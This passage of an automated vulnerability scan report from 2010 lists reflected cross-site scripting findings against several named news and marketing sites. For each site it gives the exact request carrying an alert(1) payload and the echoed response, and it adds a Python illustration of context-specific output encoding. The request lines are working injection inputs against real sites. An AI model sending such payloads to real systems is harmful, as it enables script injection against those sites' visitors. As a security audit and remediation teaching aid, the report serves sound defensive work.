HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:33:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:33:45 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506425-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 87512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<link rel="canonical" href="http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429?fae1d"><script>alert(1)</script>195ea8c76a9=1" />
...[SNIP]...

2.345. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.infoworld.com
Path:   /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f968"><script>alert(1)</script>b35de181cf was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429?source=rss_3f968"><script>alert(1)</script>b35de181cf HTTP/1.1
Host: www.infoworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:33:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.8
X-Drupal-Cache: MISS
Last-Modified: Thu, 16 Dec 2010 13:33:52 +0000
Cache-Control: public, max-age=0, public, max-age=600
ETag: "1292506432-0"
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 89236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
   <head>
<m
...[SNIP]...
<link rel="canonical" href="http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429?source=rss_3f968"><script>alert(1)</script>b35de181cf" />
...[SNIP]...

2.346. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insight24.com
Path:   /utilApp/webcastcentral/index.jsp

Issue detail

The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41caa"><script>alert(1)</script>5d3286d3257 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utilApp/webcastcentral/index.jsp?partnerref=41caa"><script>alert(1)</script>5d3286d3257 HTTP/1.1
Host: www.insight24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:34:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=XTCQNKVGVn0cDtwrvQ9TDT6hHRvQFWGnQDjynvrFhVVh0M2QLM2Z!166543021!264525680; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Set-Cookie: BIGipServerinsight24prd_wl=1006764554.36131.0000; path=/
Content-Length: 40406


           <script> var directToNewSite = true; </script>
       

    <META NAME="ROBOTS" CONTENT="FOLLOW,INDEX">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<iframe id="topicframe" name="topicframe" width="848" height="268" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" onload="changeHeight(this, 'topicframe');" src="topic.jsp?partnerref=41caa"><script>alert(1)</script>5d3286d3257&indexpage=true">
...[SNIP]...

2.347. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insight24.com
Path:   /utilApp/webcastcentral/index.jsp

Issue detail

The value of the partnerref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f337f"><script>alert(1)</script>4c65fffa152 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /utilApp/webcastcentral/index.jsp?partnerref=pr0409f337f"><script>alert(1)</script>4c65fffa152 HTTP/1.1
Host: www.insight24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:34:28 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=WRc2NKVGP0z51DThtgzwfFhRykk2wm1qd3XL190ycTLXNBf12Ryk!-1979069199!166543021; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Set-Cookie: BIGipServerinsight24prd_wl=2332164618.36643.0000; path=/
Content-Length: 40538


           <script> var directToNewSite = true; </script>
       

    <META NAME="ROBOTS" CONTENT="FOLLOW,INDEX">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<form name="searchForm" action="index.jsp?partnerref=pr0409f337f"><script>alert(1)</script>4c65fffa152&" method="post" height="0">
...[SNIP]...

2.348. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insight24.com
Path:   /utilApp/webcastcentral/index.jsp

Issue detail

The value of the partnerref request parameter is copied into an HTML comment. The payload abc7a--><script>alert(1)</script>68a71a39411 was submitted in the partnerref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The excerpt below, however, shows the payload inside the double-quoted src attribute of an iframe, where --> closes nothing and the quotation mark needed to leave the attribute was not sent; the comment-context reflection on which this finding rests is not in the excerpt, so locate it in the full response before relying on this result. The attribute reflections in 2.346 and 2.347 already establish the injection for this parameter.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /utilApp/webcastcentral/index.jsp?partnerref=pr0409abc7a--><script>alert(1)</script>68a71a39411 HTTP/1.1
Host: www.insight24.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:34:35 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=9dzFNKVL60hhrhlRP2LBGG1yr9V1PL7bQThjb3Wld5kq6vdh5Rqc!264525680!-1979069199; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Set-Cookie: BIGipServerinsight24prd_wl=1174536714.36387.0000; path=/
Content-Length: 40529


           <script> var directToNewSite = true; </script>
       

    <META NAME="ROBOTS" CONTENT="FOLLOW,INDEX">
<meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
e id="featuredframe" name="featuredframe" width="418" height="675" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" src="content.jsp?indexpage=true&config=featured-ltd&partnerref=pr0409abc7a--><script>alert(1)</script>68a71a39411&forcereload=&forcereloadpswd=&frameid=featuredframe">
...[SNIP]...

2.349. http://www.linuxworld.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linuxworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c766'-alert(1)-'07e601c82bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The same value is echoed a second time a few lines later into the double-quoted string jq_request_uri; this single-quote payload does not leave that string, but it is a second sink that any fix has to cover.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?2c766'-alert(1)-'07e601c82bd=1 HTTP/1.1
Host: www.linuxworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:35:44 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: Apache=174.121.222.18.1292506544922063; path=/; expires=Sat, 15-Dec-12 13:35:44 GMT
Accept-Ranges: bytes
Cache-Control: public, max-age=600
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 214743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
gtype: 'homepage',
           subtopic: '',
           freemium: 'n',
           nsdr_auth: 'no',
subtopicid: 0,
outerref: '(none)',
nwchannel: 'Network World',
request_uri: '/?2c766'-alert(1)-'07e601c82bd=1',
doc_uri: '/index.html',
site: 'home',
rxid: '75931',
nodeid: ''    
};
}();
var jq_nodeid = "";
var jq_request_uri = "/?2c766'-alert(1)-'07
...[SNIP]...

2.350. http://www.lunametrics.com/blog/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lunametrics.com
Path:   /blog/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e568</script><script>alert(1)</script>7674b8630 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The payload never closes the single-quoted string: the </script> sequence ends the script element at the HTML level, so escaping quotation marks alone would not fix this sink.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blog2e568</script><script>alert(1)</script>7674b8630/ HTTP/1.1
Host: www.lunametrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:35:10 GMT
Server: Apache/2.2.17
Vary: Cookie
X-Pingback: http://www.lunametrics.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 16 Dec 2010 13:35:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13525

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" dir="ltr" lang="en-US">

<head>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<script type="text/javascript">
       var pageTracker = _gat._getTracker("UA-296882-1");
       pageTracker._setAllowAnchor(true);
       pageTracker._trackPageview('/404?page=/blog2e568</script><script>alert(1)</script>7674b8630/');
   </script>
...[SNIP]...

2.351. http://www.lunametrics.com/blog/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lunametrics.com
Path:   /blog/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3581"><script>alert(1)</script>8af0ac2b3a4 was submitted in the REST URL parameter 1. This input was echoed as a3581\"><script>alert(1)</script>8af0ac2b3a4 in the application's response. The added backslash is a JavaScript/SQL-style escape (PHP addslashes or magic_quotes behaviour) and is literal text inside HTML markup: the quotation mark still terminates the attribute value and the > still closes the tag, so the injection works exactly as if nothing had been escaped.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bloga3581"><script>alert(1)</script>8af0ac2b3a4/ HTTP/1.1
Host: www.lunametrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 13:34:59 GMT
Server: Apache/2.2.17
Vary: Cookie
X-Pingback: http://www.lunametrics.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Thu, 16 Dec 2010 13:35:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13517

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" dir="ltr" lang="en-US">

<head>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<meta property="og:url" content="http://www.lunametrics.com/bloga3581\"><script>alert(1)</script>8af0ac2b3a4/"/>
...[SNIP]...

2.352. http://www.lunametrics.com/blog/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lunametrics.com
Path:   /blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28042"><script>alert(1)</script>351435a158f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28042\"><script>alert(1)</script>351435a158f in the application's response. As in 2.351, the backslash is inert in attribute context and does not stop the quotation mark from closing the value.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/?28042"><script>alert(1)</script>351435a158f=1 HTTP/1.1
Host: www.lunametrics.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:34:57 GMT
Server: Apache/2.2.17
Vary: Cookie
X-Pingback: http://www.lunametrics.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72835

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" dir="ltr" lang="en-US">

<head>
   <meta http-equiv="Content-Type" content="text/ht
...[SNIP]...
<meta property="og:url" content="http://www.lunametrics.com/blog/?28042\"><script>alert(1)</script>351435a158f=1"/>
...[SNIP]...

2.353. http://www.mailchimp.com/blog/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mailchimp.com
Path:   /blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d67aa"><script>alert(1)</script>11cbcd6f625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d67aa\"><script>alert(1)</script>11cbcd6f625 in the application's response. As with the lunametrics findings (2.351, 2.352), the backslash placed before the quotation mark is inert inside an HTML attribute; the form action is still terminated and the script tag is still live.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/?d67aa"><script>alert(1)</script>11cbcd6f625=1 HTTP/1.1
Host: www.mailchimp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:35:06 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.11
X-Pingback: http://www.mailchimp.com/blog/xmlrpc.php
Cache-Control: max-age=604800, public
Expires: Sat, 15 Jan 2011 13:35:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48630


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
<form method="post" action="/blog/?d67aa\"><script>alert(1)</script>11cbcd6f625=1#mc_signup_form" id="mc_signup_form">
...[SNIP]...

2.354. http://www.marketingvox.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marketingvox.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 81b3f</script><script>alert(1)</script>2b40ab3fc98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?81b3f</script><script>alert(1)</script>2b40ab3fc98=1 HTTP/1.1
Host: www.marketingvox.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:36:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.marketingvox.com/wp/xmlrpc.php
Status: 200 OK
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Set-Cookie: OAID=0fcfc1d03b1a285803f4f84ddc4435c0; expires=Fri, 16-Dec-2011 13:36:40 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<link rel="st
...[SNIP]...
tingvox.com']);
_gaq.push(['_addOrganic', 'images.google', 'prev']);
_gaq.push(['_trackPageview', 'MV: Home:']);

_gaq.push(['t2._setAccount', 'UA-349425-12']);
_gaq.push(['t2._trackPageview', '/?81b3f</script><script>alert(1)</script>2b40ab3fc98=1']);

_gaq.push(['t3._setAccount', 'UA-349425-18']);
_gaq.push(['t3._setDomainName', 'none']);
_gaq.push(['t3._setAllowLinker', true]);
_gaq.push(['t3._addOrganic', 'images.google', 'prev']);
_
...[SNIP]...

2.355. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minonline.com
Path:   /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90104"><script>alert(1)</script>ba6645dcba was submitted in the REST URL parameter 1. This input was echoed as 90104\"><script>alert(1)</script>ba6645dcba in the application's response. As in 2.351 to 2.353, the backslash is inert in attribute context: the quotation mark still closes the src value of the tracking image and the script tag that follows is live.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news90104"><script>alert(1)</script>ba6645dcba/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html HTTP/1.1
Host: www.minonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:35:21 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43076

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="ver
...[SNIP]...
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://datacol.accessintel.com/dcstdli4u10000oqw5j6che0b_4y1q/njs.gif?dcsuri=/news90104\"><script>alert(1)</script>ba6645dcba/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html&amp;dcsqry=&amp;WT.js=No" />
...[SNIP]...

2.356. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minonline.com
Path:   /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ca12"><script>alert(1)</script>f497db04a8a was submitted in the REST URL parameter 2. This input was echoed as 5ca12\"><script>alert(1)</script>f497db04a8a in the application's response. As in 2.355, the backslash does nothing inside the attribute.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html5ca12"><script>alert(1)</script>f497db04a8a HTTP/1.1
Host: www.minonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:35:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43236

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="ver
...[SNIP]...
<img alt="" border="0" name="DCSIMG" width="1" height="1" src="http://datacol.accessintel.com/dcstdli4u10000oqw5j6che0b_4y1q/njs.gif?dcsuri=/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html5ca12\"><script>alert(1)</script>f497db04a8a&amp;dcsqry=&amp;WT.js=No" />
...[SNIP]...

2.357. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.minonline.com
Path:   /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31c1a<script>alert(1)</script>1dd15bbf65d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html31c1a<script>alert(1)</script>1dd15bbf65d HTTP/1.1
Host: www.minonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 13:35:23 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43230

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="ver
...[SNIP]...
<b>/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html31c1a<script>alert(1)</script>1dd15bbf65d</b>
...[SNIP]...
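Between them, findings 2.348 to 2.357 cover every sink context this report sees: a double-quoted attribute, a single- or double-quoted JavaScript string, an HTML comment and text between tags, and three of the sites (lunametrics, mailchimp, minonline) answer with a backslash in front of the quotation mark that changes nothing in an attribute. The Python below is an added illustration written for this page, not code from any of the sites: it renders the report's payload shapes the way the affected templates do, including that backslash treatment, and then again with an encoder chosen for each context. The template strings are modelled on the report's excerpts and the host example.test is made up.

```python
"""The sink contexts this report keeps finding, rendered the way the affected
pages do it and then with encoding chosen per context.  Illustration written for
this page, not code from any of the sites.  Templates are modelled on the
report's excerpts; example.test is a made-up host."""
import html
import json

# Payload shapes the report used, one per context.
PAYLOAD_ATTR = '"><script>alert(1)</script>'   # double-quoted attribute (2.351-2.357)
PAYLOAD_JS = "'-alert(1)-'"                    # single-quoted JS string (2.349)
PAYLOAD_CMT = "--><script>alert(1)</script>"   # HTML comment (2.348)


def addslashes(s: str) -> str:
    """PHP addslashes()/magic_quotes, the treatment lunametrics, mailchimp and
    minonline applied.  A backslash escapes in JavaScript or SQL, not in HTML."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def render_vulnerable(path: str, request_uri: str, partnerref: str) -> str:
    """Each value lands in the context the report describes, with at most the
    backslash treatment the captured responses show."""
    return (
        f'<link rel="canonical" href="http://example.test{addslashes(path)}" />\n'
        f"<script>\nvar request_uri = '{request_uri}';\n</script>\n"
        f"<!-- partner: {partnerref} -->\n"
        f"<b>{path}</b>\n"
    )


def for_attribute(s: str) -> str:
    """Double-quoted attribute value: encode & < > \" ' so the quote stays closed."""
    return html.escape(s, quote=True)


def for_js_string(s: str) -> str:
    """JavaScript string literal: JSON-encode (quotes, backslashes, control
    characters), then escape < and > so a literal </script> in the data cannot
    end the <script> element, which no JavaScript-level escaping prevents."""
    return json.dumps(s).replace("<", "\\u003c").replace(">", "\\u003e")


def for_comment(s: str) -> str:
    """Inside <!-- -->: '--' is the only sequence that can end the comment
    (--> and --!>); break it, and neutralise markup for good measure."""
    return s.replace("--", "- -").replace("<", "&lt;").replace(">", "&gt;")


def for_text(s: str) -> str:
    """Text between tags: encoding & < > is enough; quotes are harmless here."""
    return html.escape(s, quote=False)


def render_hardened(path: str, request_uri: str, partnerref: str) -> str:
    """Same template, each insertion point encoded for the context it sits in."""
    return (
        f'<link rel="canonical" href="http://example.test{for_attribute(path)}" />\n'
        f"<script>\nvar request_uri = {for_js_string(request_uri)};\n</script>\n"
        f"<!-- partner: {for_comment(partnerref)} -->\n"
        f"<b>{for_text(path)}</b>\n"
    )


def demo():
    """Render the report's payloads both ways; returns (vulnerable, hardened)."""
    args = ("/blog" + PAYLOAD_ATTR + "/", "/?" + PAYLOAD_JS + "=1", "pr0409" + PAYLOAD_CMT)
    return render_vulnerable(*args), render_hardened(*args)


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print(vulnerable)
    print(hardened)
```

The point of keeping four separate encoders is that none of them is interchangeable: html.escape on its own leaves a </script> inside a string literal able to end the script element, json.dumps on its own leaves a quotation mark in an attribute able to end the value, and neither touches the two hyphens that end a comment. The addslashes() output is there to show why the backslashed echoes in 2.351 to 2.356 are not a mitigation: the quotation mark is still present.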

2.358. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkworld.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf22b'-alert(1)-'37d290c00bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. The response body is the same Network World home page that www.linuxworld.com returned in 2.349 (identical Content-Length of 214743 and the same nwchannel value), so the two findings are one bug in a shared code base. As there, the value is echoed a second time into the double-quoted string jq_request_uri, which this payload does not leave but which the fix must cover as well.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?bf22b'-alert(1)-'37d290c00bd=1 HTTP/1.1
Host: www.networkworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
nnCoection: close
Content-Type: text/html; charset=UTF-8
Expires: Thu, 16 Dec 2010 13:36:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 16 Dec 2010 13:36:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Apache=174.121.222.18.1292506592736317; path=/; expires=Sat, 15-Dec-12 13:36:32 GMT
Content-Length: 214743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
gtype: 'homepage',
           subtopic: '',
